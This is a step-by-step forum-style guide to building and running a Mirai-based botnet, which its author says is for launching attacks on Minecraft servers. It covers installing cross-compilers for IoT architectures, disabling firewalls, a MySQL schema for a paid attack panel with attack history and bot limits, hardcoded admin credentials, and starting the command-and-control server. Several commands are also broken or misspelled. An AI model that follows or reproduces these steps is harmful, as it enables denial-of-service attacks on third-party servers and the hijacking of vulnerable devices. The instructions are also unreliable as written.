Edited by @basedpakku

--Tested on ubuntu 22

--Drag whole folder into /root
--Full tutorial from scratch even though mirai is dead but still some skiddies want to build mirai botnet to launch attack on minecraft servers.

[01]- Installing Dependencies required for customer_botnet
 apt-get update -y
 apt-get upgrade -y
 apt-get install gcc electric-fence sudo git bzip2 -y
 apt-get install mysql-server mysql-client -y
 apt-get install nano make screen apache2 -y
 

[1.1]- Check golang version
  go version
  -- IF 1.20 OR ABOVE YOURE GOOD
  -- NOW RUN
  go get github.com/go-sql-driver/mysql
  go get github.com/mattn/go-shellwords

[02]- Installing and Compiling the Cross-Compilers (with new active urls for them)
  rm -rf /etc/xcompile
 mkdir /etc/xcompile
 cd /etc/xcompile
 
 wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv4l.tar.bz2
 wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-i586.tar.bz2
 wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-m68k.tar.bz2
 wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-mips.tar.bz2
 wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-mipsel.tar.bz2
 wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-powerpc.tar.bz2
 wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-sh4.tar.bz2
 wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-sparc.tar.bz2
 wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv6l.tar.bz2
 wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-x86_64.tar.bz2
 wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2
 wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv5l.tar.bz2
 
 tar -jxf cross-compiler-armv4l.tar.bz2
 tar -jxf cross-compiler-i586.tar.bz2
 tar -jxf cross-compiler-m68k.tar.bz2
 tar -jxf cross-compiler-mips.tar.bz2
 tar -jxf cross-compiler-mipsel.tar.bz2
 tar -jxf cross-compiler-powerpc.tar.bz2
 tar -jxf cross-compiler-sh4.tar.bz2
 tar -jxf cross-compiler-sparc.tar.bz2
 tar -jxf cross-compiler-armv6l.tar.bz2
 tar -jxf cross-compiler-x86_64.tar.bz2
 tar -jxf cross-compiler-armv7l.tar.bz2
 tar -jxf cross-compiler-armv5l.tar.bz2
 
 mv cross-compiler-armv4l armv4l
 mv cross-compiler-i586 i586
 mv cross-compiler-m68k m68k
 mv cross-compiler-mips mips
 mv cross-compiler-mipsel mipsel
 mv cross-compiler-powerpc powerpc
 mv cross-compiler-sh4 sh4
 mv cross-compiler-sparc sparc
 mv cross-compiler-armv6l armv6l
 mv cross-compiler-x86_64 x86_64
 mv cross-compiler-armv7l armv7l
 mv cross-compiler-armv5l armv5l

[03]- For adding GoLang Paths

export PATH=$PATH:/etc/xcompile/armv4l/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin
export PATH=$PATH:/etc/xcompile/i586/bin
export PATH=$PATH:/etc/xcompile/m68k/bin
export PATH=$PATH:/etc/xcompile/mips/bin
export PATH=$PATH:/etc/xcompile/mipsel/bin
export PATH=$PATH:/etc/xcompile/powerpc/bin
export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
export PATH=$PATH:/etc/xcompile/sh4/bin
export PATH=$PATH:/etc/xcompile/sparc/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin
export PATH=$PATH:/etc/xcompile/x86_64/bin
export PATH=$PATH:/etc/xcompile/armv7l/bin
export PATH=$PATH:/etc/xcompile/armv5l/bin
 
[05]- Database Setup
--If you have iptbales/ip6tables or any firewall install disable it.
 
service iptables stop
/etc/ini.d/iptbales stop
 
--Database Setup
;Type the following command:
mysql_secure_installation

mysql -u root -p    (

;Now you will have to type these to create database for botnet:
CREATE DATABASE botnet;
use botnet;

CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL,
  `time_sent` int(10) unsigned NOT NULL,
  `duration` int(10) unsigned NOT NULL,
  `command` text NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);
 
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  `duration_limit` int(10) unsigned DEFAULT NULL,
  `cooldown` int(10) unsigned NOT NULL,
  `wrc` int(10) unsigned DEFAULT NULL,
  `last_paid` int(10) unsigned NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  `admin` int(10) unsigned DEFAULT '0',
  `intvl` int(10) unsigned DEFAULT '30',
  `api_key` text,
  PRIMARY KEY (`id`),
  KEY `username` (`username`)
);
 
CREATE TABLE `whitelist` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `prefix` varchar(16) DEFAULT NULL,
  `netmask` tinyint(3) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `prefix` (`prefix`)
);

INSERT INTO users VALUES (NULL, 'MrLethal', 'MaddieDawn#1289', 0, 0, 0, 0, -1, 1, 30, '');

CREATE USER 'cnc'@'localhost' IDENTIFIED BY 'pakkupassword';
GRANT ALL PRIVILEGES ON *.* TO 'cnc'@'localhost' WITH GRANT OPTION;

type: exit

[06]- Botnet setup

tar -xzf go1.20.linux-amd64.tar.gz -C /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
source ~/.bashrc

service mysql restart
cd customer_botnet
chmod +x build.sh
./build.sh
screen -S cnc
ulimit -n 999999
go build -o cnc_handler cnc/*.c
./cnc_handler

echo "enter your prompt here" > prompt.txt

CTRL a + d

